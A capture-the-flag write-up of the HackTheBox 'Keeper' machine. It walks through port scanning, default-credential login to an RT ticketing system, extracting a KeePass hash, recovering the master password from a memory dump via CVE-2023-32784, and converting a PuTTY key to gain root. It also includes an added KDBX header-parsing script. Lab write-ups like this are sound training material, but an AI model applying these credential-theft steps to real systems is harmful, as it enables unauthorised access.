#hackthebox #easy #linux #keepass #puttygen #putty-tools

![[Pasted image 20250729220616.png]]

# Information Gathering

Started off with a TCP scan against all 65,535 ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -Pn -n --open $IP --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 01:02 UTC
Nmap scan report for 10.10.11.227
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds
```

Hit 2 open ports. Let's perform another TCP scan, this time only against the 2 open ports found.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sCV $IP -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 01:04 UTC
Nmap scan report for 10.10.11.227
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.94 seconds
```

Finally, a UDP scan against the top 10 ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sU $IP --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 01:05 UTC
Nmap scan report for 10.10.11.227
Host is up (0.047s latency).

PORT     STATE         SERVICE
53/udp   closed        domain
67/udp   closed        dhcps
123/udp  closed        ntp
135/udp  closed        msrpc
137/udp  open|filtered netbios-ns
138/udp  closed        netbios-dgm
161/udp  closed        snmp
445/udp  closed        microsoft-ds
631/udp  closed        ipp
1434/udp open|filtered ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds
```

# Enumeration

##### HTTP - TCP 80

Since there are only 2 open ports, 22 and 80, I'll start hunting for information on port 80. Upon landing, there's nothing but a hyperlink on the website.

![[Pasted image 20250729200839.png]]

The link takes you to `tickets.keeper.htb/rt` but doesn't load anything. Let's add it to `/etc/hosts` and see if that resolves the issue.

![[Pasted image 20250729201137.png]]

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo '10.10.11.227 tickets.keeper.htb' | sudo tee -a /etc/hosts
[sudo] password for kali: 
10.10.11.227 tickets.keeper.htb
```

Alright, now it loads content and there's a login form.

![[Pasted image 20250729201414.png]]

I searched for `best practical default credentials` and found the official forum of `best practical` (the vendor of the RT ticketing system) where they talk about default credentials.

![[Pasted image 20250729202747.png]]
![[Pasted image 20250729202928.png]]

With that hint from the forum, I tried `root:password` in the login form and successfully got in!

![[Pasted image 20250729203051.png]]

# Initial Access - Shell as `lnorgaard`

Under the `Admin` tab, I found another user named `lnorgaard` besides `root`.

![[Pasted image 20250729203126.png]]

I noticed the `name` was clickable, so I clicked on the username to gather more information and found the user's initial password.

![[Pasted image 20250729203758.png]]
![[Pasted image 20250729204011.png]]

Found `user.txt`:

```bash
lnorgaard@keeper:~$ ls
RT30000.zip  user.txt
lnorgaard@keeper:~$ cat user.txt
4e3c...
```

# Privilege Escalation

There's another file in `/home/lnorgaard` besides `user.txt`: `RT30000.zip`.
Using the `unzip -l` command, I can see the contents of the `.zip` file without extracting it first. There are two files: `KeePassDumpFull.dmp` and `passcodes.kdbx`. Let's extract them.

```bash
lnorgaard@keeper:~$ ls
RT30000.zip  user.txt
lnorgaard@keeper:~$ file RT30000.zip
RT30000.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
lnorgaard@keeper:~$ unzip -l RT30000.zip
Archive:  RT30000.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
253395188  2023-05-24 12:51   KeePassDumpFull.dmp
     3630  2023-05-24 12:51   passcodes.kdbx
---------                     -------
253398818                     2 files
```

I'm more interested in `passcodes.kdbx` because we can try cracking it without knowing the password, using `keepass2john` and `JtR`. Let's put the dump file aside for now.

```bash
lnorgaard@keeper:~$ file KeePassDumpFull.dmp
KeePassDumpFull.dmp: Mini DuMP crash report, 16 streams, Fri May 19 13:46:21 2023, 0x1806 type
lnorgaard@keeper:~$ file passcodes.kdbx
passcodes.kdbx: Keepass password database 2.x KDBX
```

I'm going to transfer the KeePass password database file to my Kali box via `SSH`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ scp lnorgaard@$IP:/home/lnorgaard/passcodes.kdbx .
lnorgaard@10.10.11.227's password: 
passcodes.kdbx                                100% 3630    38.6KB/s   00:00    

┌──(kali㉿kali)-[~/Desktop]
└─$ ls -l passcodes.kdbx
-rwxr-x--- 1 kali kali 3630 Jul 30 01:49 passcodes.kdbx
```

Converted the `.kdbx` file to a `hash` with `keepass2john`:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ keepass2john passcodes.kdbx > passcodes.hash

┌──(kali㉿kali)-[~/Desktop]
└─$ cat passcodes.hash
passcodes:$keepass$*2*60000*0*5d7b4747e5a278d572fb0a66fe187ae5d74a0e2f56a2aaaf4c4f2b8ca342597d*5b7ec1cf6889266a388abe398d7990a294bf2a581156f7a7452b4074479bdea7*08500fa5a52622ab89b0addfedd5a05c*411593ef0846fc1bb3db4f9bab515b42e58ade0c25096d15f090b0fe10161125*a4842b416f14723513c5fb704a2f49024a70818e786f07e68e82a6d3d7cdbcdc
```

I tried cracking the hash with `john` and it was taking far too much time. I believe this isn't the intended way to solve the box.
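To see what `file` and `keepass2john` are actually reading, here is an added Python example (not from the writeup, KeePass or John the Ripper) that parses the unencrypted KDBX outer header: the two signature values that `file` matches as "2.x KDBX", the format version, the cipher, and the AES-KDF transform rounds, which is the `60000` in the hash above and the reason every `john` guess costs 60000 AES rounds. The sample header is constructed inline with dummy seeds; the parser also handles the wider KDBX 4 field lengths, which this box's 3.x file does not use.

```python
import struct

KDBX_SIG1 = 0x9AA2D903
KDBX_SIG2 = 0xB54BFB67  # KeePass 2.x release database; `file` reports this as "2.x KDBX"
# Cipher UUIDs in the byte order they appear on disk
CIPHERS = {
    bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"): "AES-256",
    bytes.fromhex("d6038a2b8b6f4cb5a524339a31dbb59a"): "ChaCha20",
}
AES_UUID = next(iter(CIPHERS))

def parse_kdbx_header(blob):
    """Walk the unencrypted outer header of a KDBX file and return its key parameters."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", blob, 0)
    if sig1 != KDBX_SIG1 or sig2 != KDBX_SIG2:
        raise ValueError("not a KeePass 2.x KDBX file")
    info = {"version": f"{major}.{minor}", "cipher": None, "rounds": None, "kdf": None}
    # KDBX 3.x stores each field length as u16; KDBX 4 widened it to u32
    entry_fmt = "<BH" if major < 4 else "<BI"
    off = 12
    while True:
        fid, size = struct.unpack_from(entry_fmt, blob, off)
        off += struct.calcsize(entry_fmt)
        data = blob[off:off + size]
        off += size
        if fid == 0:      # end-of-header marker
            break
        if fid == 2:      # cipher UUID
            info["cipher"] = CIPHERS.get(data, "unknown")
        elif fid == 6:    # AES-KDF transform rounds (KDBX 3.x): the 60000 in the john hash
            info["rounds"], info["kdf"] = struct.unpack("<Q", data)[0], "AES-KDF"
        elif fid == 11:   # KDBX 4 KDF parameters (VariantDictionary: Argon2 or AES-KDF)
            info["kdf"] = "KDBX4 VariantDictionary"
    return info

def build_sample_kdbx3_header(rounds=60000):
    """Constructed KDBX 3.1 header (dummy seeds) with the writeup's transform round count."""
    def field(fid, data):
        return struct.pack("<BH", fid, len(data)) + data
    return (struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)
            + field(2, AES_UUID)
            + field(3, struct.pack("<I", 1))          # compression: gzip
            + field(4, b"\x11" * 32)                   # master seed
            + field(5, b"\x22" * 32)                   # transform seed
            + field(6, struct.pack("<Q", rounds))      # transform rounds
            + field(7, b"\x33" * 16)                   # encryption IV
            + field(8, b"\x44" * 32)                   # protected stream key
            + field(9, b"\x55" * 32)                   # stream start bytes
            + field(10, struct.pack("<I", 2))         # inner random stream: Salsa20
            + field(0, b"\r\n\r\n"))                  # end of header

if __name__ == "__main__":
    print(parse_kdbx_header(build_sample_kdbx3_header()))
```

Point it at a real `.kdbx` with `parse_kdbx_header(open(path, "rb").read())` to read the round count and cipher of your own database without opening it.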
I am now turning to the dump file. The dump file is very large, so it's nearly impossible to find useful information in it even if I use the `strings` command to extract only human-readable data. I looked at the file type of the KeePass DB file again: `Keepass password database 2.x KDBX`

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ file passcodes.kdbx
passcodes.kdbx: Keepass password database 2.x KDBX
```

Apparently, there is a known vulnerability in this version of `KeePass`: `CVE-2023-32784`.

![[Pasted image 20250729213436.png]]

The original PoC code is written in `.NET`, but I'm going to use a Python version which you can download from [here](https://github.com/matro7sh/keepass-dump-masterkey).

Running the PoC, it returned multiple possible passwords. The author of the exploit mentioned that the exploit is not able to find the first character of the password, so we would have to brute-force the very first character.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 poc.py -d KeePassDumpFull.dmp
2025-07-30 02:35:59,759 [.] [main] Opened KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de
```

I just searched for `drgrod med flode` on Google instead and it returned the following:

![[Pasted image 20250729213959.png]]

`Rødgrød med fløde` is a Danish red berry pudding. This makes sense because we saw that the user `lnorgaard`, or `Lise Nørgaard`, is Danish.
![[Pasted image 20250729214222.png]]

I entered `rødgrød med fløde` as the password and I was in :)

![[Pasted image 20250729214522.png]]

I found a `password` which I tried over SSH for `root`, and it did not work. In the `Notes` section, it says `PuTTY-User-Key-File-3: ssh-rsa` at the very top. I think I would have to log in as `root` using this key file.

![[Pasted image 20250729215133.png]]

I learned that in order to use this key, I would have to convert it to a format that `OpenSSH` can understand. `puttygen` can help us do so. `puttygen` comes with the `putty-tools` package. I installed `putty-tools` with the following command: `sudo apt install putty-tools`

We can convert it to an `OpenSSH private key` using the `-O` flag.

![[Pasted image 20250729215750.png]]

Now I have the OpenSSH private key. Let's try logging into SSH as `root` with the key.

![[Pasted image 20250729220403.png]]

Logged in as `root`!

![[Pasted image 20250729220516.png]]

Got `root.txt`:

```bash
root@keeper:~# cd /root
root@keeper:~# ls
root.txt  RT30000.zip  SQL
root@keeper:~# cat root.txt
5cc...
```